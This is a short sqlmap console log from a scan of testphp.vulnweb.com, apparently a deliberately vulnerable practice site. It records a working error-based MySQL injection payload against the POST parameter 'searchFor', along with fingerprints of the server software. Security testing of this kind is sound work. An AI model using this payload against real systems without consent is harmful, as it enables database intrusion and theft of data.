        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.9.7.7#dev}
|_ -| . [']     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:13:06 /2025-08-14/

[12:13:06] [WARNING] using '/Users/revantpatel/SecWiz/resources' as the output directory
[12:13:06] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.17) Gecko/20110420 Firefox/3.6' from file '/Users/revantpatel/SecWiz/externalTools/sqlmap/data/txt/user-agents.txt'
[12:13:06] [INFO] resuming back-end DBMS 'mysql' 
[12:13:06] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: searchFor (POST)
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: searchFor=1' AND EXTRACTVALUE(7742,CONCAT(0x5c,0x7170627071,(SELECT (ELT(7742=7742,1))),0x7176626a71)) AND 'eDsc'='eDsc
---
[12:13:06] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL >= 5.1
[12:13:06] [INFO] fetched data logged to text files under '/Users/revantpatel/SecWiz/resources/testphp.vulnweb.com'

[*] ending @ 12:13:06 /2025-08-14/

